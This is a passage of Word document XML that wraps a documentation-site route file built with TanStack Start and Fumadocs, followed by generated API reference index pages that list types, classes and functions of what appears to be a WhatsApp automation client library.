      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { createServerFn } from '@tanstack/react-start';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { source } from '@/lib/source';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import browserCollections from 'fumadocs-mdx:collections/browser';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  DocsBody,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  DocsDescription,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  DocsPage,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  DocsTitle,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">} from 'fumadocs-ui/layouts/docs/page';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import defaultMdxComponents from 'fumadocs-ui/mdx';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { baseOptions } from '@/lib/layout.shared';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { staticFunctionMiddleware } from '@tanstack/start-static-server-functions';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { useFumadocsLoader } from 'fumadocs-core/source/client';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Route = createFileRoute('/docs/$')({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  component: Page,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  loader: async ({ params }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const slugs = params._splat?.split('/') ?? [];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const data = await loader({ data: slugs });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await clientLoader.preload(data.path);</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loader = createServerFn({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  method: 'GET',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.inputValidator((slugs: string[]) =&gt; slugs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  .middleware([staticFunctionMiddleware])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  .handler(async ({ data: slugs }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const page = source.getPage(slugs);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!page) throw notFound();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path: page.path,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      pageTree: await source.serializePageTree(source.pageTree),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clientLoader = browserCollections.docs.createClientLoader({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  component({ toc, frontmatter, default: MDX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&lt;DocsPage toc={toc}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;DocsTitle&gt;{frontmatter.title}&lt;/DocsTitle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;DocsDescription&gt;{frontmatter.description}&lt;/DocsDescription&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;DocsBody&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;MDX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            components={{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              ...defaultMdxComponents,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&lt;/DocsBody&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/DocsPage&gt;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Page() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const data = Route.useLoaderData();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const Content = clientLoader.getComponent(data.path);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const { pageTree } = useFumadocsLoader(data);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&lt;DocsLayout {...baseOptions()} tree={pageTree}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;Content /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/DocsLayout&gt;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apps/docs/src/routes/docs/$.tsx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docs/docs/reference/api/Client/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/Client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[namespace](/reference/api/Client/enumerations/namespace.md)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[Client](/reference/api/Client/classes/Client.md)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[useragent](/reference/api/Client/variables/useragent.md)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docs/docs/reference/api/Client/index.md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docs/docs/reference/api/model/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/model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[Events](/reference/api/model/enumerations/Events.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [STATE](/reference/api/model/enumerations/STATE.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [Status](/reference/api/model/enumerations/Status.md)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[EasyApiResponse](/reference/api/model/type-aliases/EasyApiResponse.md)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References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AccountNumber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[AccountNumber](/reference/api/model/aliases/type-aliases/AccountNumber.md)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AddParticipantError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[AddParticipantError](/reference/api/model/errors/classes/AddParticipantError.md)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AddParticipantErrorStatusCode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[AddParticipantErrorStatusCode](/reference/api/model/errors/enumerations/AddParticipantErrorStatusCode.md)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[AdvancedConfig](/reference/api/model/config/type-aliases/AdvancedConfig.md)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AdvancedFile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[AdvancedFile](/reference/api/model/aliases/type-aliases/AdvancedFile.md)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Base64</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[Base64](/reference/api/model/aliases/type-aliases/Base64.md)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BaseChat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[BaseChat](/reference/api/model/chat/interfaces/BaseChat.md)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BizCategory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[BizCategory](/reference/api/model/contact/interfaces/BizCategory.md)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BizProfileOptions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[BizProfileOptions](/reference/api/model/contact/interfaces/BizProfileOptions.md)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BusinessHours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[BusinessHours](/reference/api/model/contact/interfaces/BusinessHours.md)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BusinessProfile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[BusinessProfile](/reference/api/model/contact/interfaces/BusinessProfile.md)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CLOUD\_PROVIDERS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[CLOUD_PROVIDERS](/reference/api/model/config/enumerations/CLOUD_PROVIDERS.md)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[Call](/reference/api/model/call/interfaces/Call.md)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[CallState](/reference/api/model/call/enumerations/CallState.md)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CartItem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[CartItem](/reference/api/model/product/interfaces/CartItem.md)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[Chat](/reference/api/model/chat/type-aliases/Chat.md)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[ChatId](/reference/api/model/aliases/type-aliases/ChatId.md)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ChatMuteDuration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[ChatMuteDuration](/reference/api/model/chat/enumerations/ChatMuteDuration.md)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[ChatServer](/reference/api/model/aliases/type-aliases/ChatServer.md)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[ChatState](/reference/api/model/chat/enumerations/ChatState.md)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[ChatTypes](/reference/api/model/chat/enumerations/ChatTypes.md)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[ConfigObject](/reference/api/model/config/interfaces/ConfigObject.md)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[Contact](/reference/api/model/contact/interfaces/Contact.md)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ContactId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[ContactId](/reference/api/model/aliases/type-aliases/ContactId.md)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[Content](/reference/api/model/aliases/type-aliases/Content.md)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CountryCode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[CountryCode](/reference/api/model/aliases/type-aliases/CountryCode.md)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[CustomError](/reference/api/model/errors/classes/CustomError.md)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CustomProduct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[CustomProduct](/reference/api/model/product/interfaces/CustomProduct.md)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DIRECTORY\_STRATEGY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[DIRECTORY_STRATEGY](/reference/api/model/config/enumerations/DIRECTORY_STRATEGY.md)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DataURL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[DataURL](/reference/api/model/aliases/type-aliases/DataURL.md)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DevTools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[DevTools](/reference/api/model/config/interfaces/DevTools.md)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ERROR\_NAME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[ERROR_NAME](/reference/api/model/errors/enumerations/ERROR_NAME.md)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EphemeralDuration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[EphemeralDuration](/reference/api/model/chat/type-aliases/EphemeralDuration.md)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EventPayload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[EventPayload](/reference/api/model/config/interfaces/EventPayload.md)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FilePath</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[FilePath](/reference/api/model/aliases/type-aliases/FilePath.md)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GetURL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[GetURL](/reference/api/model/aliases/type-aliases/GetURL.md)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[GroupChat](/reference/api/model/chat/interfaces/GroupChat.md)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GroupChatCreationParticipantAddResponse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[GroupChatCreationParticipantAddResponse](/reference/api/model/chat/interfaces/GroupChatCreationParticipantAddResponse.md)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GroupChatCreationResponse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[GroupChatCreationResponse](/reference/api/model/chat/interfaces/GroupChatCreationResponse.md)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[GroupChatId](/reference/api/model/aliases/type-aliases/GroupChatId.md)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GroupChatServer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[GroupChatServer](/reference/api/model/aliases/type-aliases/GroupChatServer.md)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[GroupId](/reference/api/model/aliases/type-aliases/GroupId.md)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Label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[Label](/reference/api/model/label/interfaces/Label.md)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LicenseType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[LicenseType](/reference/api/model/config/enumerations/LicenseType.md)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LiveLocationChangedEvent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[LiveLocationChangedEvent](/reference/api/model/chat/interfaces/LiveLocationChangedEvent.md)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[Message](/reference/api/model/message/interfaces/Message.md)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MessageAck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[MessageAck](/reference/api/model/message/enumerations/MessageAck.md)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[MessageId](/reference/api/model/aliases/type-aliases/MessageId.md)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MessageInfo</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[MessageInfo](/reference/api/model/message/interfaces/MessageInfo.md)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MessageInfoInteraction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[MessageInfoInteraction](/reference/api/model/message/interfaces/MessageInfoInteraction.md)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MessagePinDuration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[MessagePinDuration](/reference/api/model/message/type-aliases/MessagePinDuration.md)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[MessageTypes](/reference/api/model/message/enumerations/MessageTypes.md)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Mp4StickerConversionProcessOptions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[Mp4StickerConversionProcessOptions](/reference/api/model/media/type-aliases/Mp4StickerConversionProcessOptions.md)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NonSerializedId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[NonSerializedId](/reference/api/model/aliases/type-aliases/NonSerializedId.md)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NotificationLanguage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[NotificationLanguage](/reference/api/model/config/enumerations/NotificationLanguage.md)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NumberCheck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[NumberCheck](/reference/api/model/contact/interfaces/NumberCheck.md)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OnError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[OnError](/reference/api/model/config/enumerations/OnError.md)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Order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[Order](/reference/api/model/product/interfaces/Order.md)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PageEvaluationTimeout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[PageEvaluationTimeout](/reference/api/model/errors/classes/PageEvaluationTimeout.md)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[PollData](/reference/api/model/message/interfaces/PollData.md)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PollOption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[PollOption](/reference/api/model/message/interfaces/PollOption.md)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PollVote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[PollVote](/reference/api/model/message/interfaces/PollVote.md)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Product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[Product](/reference/api/model/product/interfaces/Product.md)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ProxyServerCredentials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[ProxyServerCredentials](/reference/api/model/config/interfaces/ProxyServerCredentials.md)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QRFormat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[QRFormat](/reference/api/model/config/enumerations/QRFormat.md)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QRQuality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[QRQuality](/reference/api/model/config/enumerations/QRQuality.md)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QuoteMap</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[QuoteMap](/reference/api/model/message/interfaces/QuoteMap.md)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[Reaction](/reference/api/model/reactions/type-aliases/Reaction.md)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ReactionEvent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[ReactionEvent](/reference/api/model/reactions/type-aliases/ReactionEvent.md)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ReactionRecord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[ReactionRecord](/reference/api/model/reactions/type-aliases/ReactionRecord.md)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ReactionSender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[ReactionSender](/reference/api/model/message/interfaces/ReactionSender.md)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[SessionData](/reference/api/model/config/interfaces/SessionData.md)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SessionExpiredError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[SessionExpiredError](/reference/api/model/errors/classes/SessionExpiredError.md)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SimpleListener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[SimpleListener](/reference/api/model/events/enumerations/SimpleListener.md)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SingleChat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[SingleChat](/reference/api/model/chat/interfaces/SingleChat.md)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StickerMetadata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[StickerMetadata](/reference/api/model/media/type-aliases/StickerMetadata.md)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WaServers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[WaServers](/reference/api/model/aliases/type-aliases/WaServers.md)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[Webhook](/reference/api/model/config/interfaces/Webhook.md)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defaultProcessOptions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Re-exports [defaultProcessOptions](/reference/api/model/media/variables/defaultProcessOptions.md)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docs/docs/reference/api/model/index.md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docs/docs/reference/controllers/events/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># controllers/events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[ev](/reference/controllers/events/variables/ev.md)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docs/docs/reference/controllers/events/index.md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docs/docs/reference/controllers/init_patch/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># controllers/init\_patch</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docs/docs/reference/controllers/init_patch/index.md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docs/docs/reference/controllers/initializer/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># controllers/initializer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[configWithCases](/reference/controllers/initializer/variables/configWithCases.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [pkg](/reference/controllers/initializer/variables/pkg.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [screenshot](/reference/controllers/initializer/variables/screenshot.md)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[create](/reference/controllers/initializer/functions/create.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [timeout](/reference/controllers/initializer/functions/timeout.md)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docs/docs/reference/controllers/initializer/index.md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docs/docs/reference/controllers/patch_manager/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># controllers/patch\_manager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[earlyInjectionCheck](/reference/controllers/patch_manager/functions/earlyInjectionCheck.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [getAndInjectLicense](/reference/controllers/patch_manager/functions/getAndInjectLicense.md)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docs/docs/reference/controllers/patch_manager/index.md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docs/docs/reference/logging/custom_transport/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># logging/custom\_transport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[LogToEvTransport](/reference/logging/custom_transport/classes/LogToEvTransport.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [NoOpTransport](/reference/logging/custom_transport/classes/NoOpTransport.md)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docs/docs/reference/logging/custom_transport/index.md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docs/docs/reference/logging/logging/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># logging/logging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[ConfigLogTransport](/reference/logging/logging/type-aliases/ConfigLogTransport.md)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[log](/reference/logging/logging/variables/log.md)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Functions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[addRotateFileLogTransport](/reference/logging/logging/functions/addRotateFileLogTransport.md)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docs/docs/reference/logging/logging/index.md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docs/docs/reference/structures/Collector/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># structures/Collector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[Collection](/reference/structures/Collector/classes/Collection.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [Collector](/reference/structures/Collector/classes/Collector.md)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[AwaitMessagesOptions](/reference/structures/Collector/interfaces/AwaitMessagesOptions.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [CollectorOptions](/reference/structures/Collector/interfaces/CollectorOptions.md)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[CollectorFilter](/reference/structures/Collector/type-aliases/CollectorFilter.md)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docs/docs/reference/structures/Collector/index.md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docs/docs/reference/structures/Dialog/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># structures/Dialog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[ValidationType](/reference/structures/Dialog/enumerations/ValidationType.md)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Interfaces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[CurrentDialogProps](/reference/structures/Dialog/interfaces/CurrentDialogProps.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [DialogButtons](/reference/structures/Dialog/interfaces/DialogButtons.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [DialogListMessageRow](/reference/structures/Dialog/interfaces/DialogListMessageRow.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [DialogListMessageSection](/reference/structures/Dialog/interfaces/DialogListMessageSection.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [DialogProperty](/reference/structures/Dialog/interfaces/DialogProperty.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [DialogState](/reference/structures/Dialog/interfaces/DialogState.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
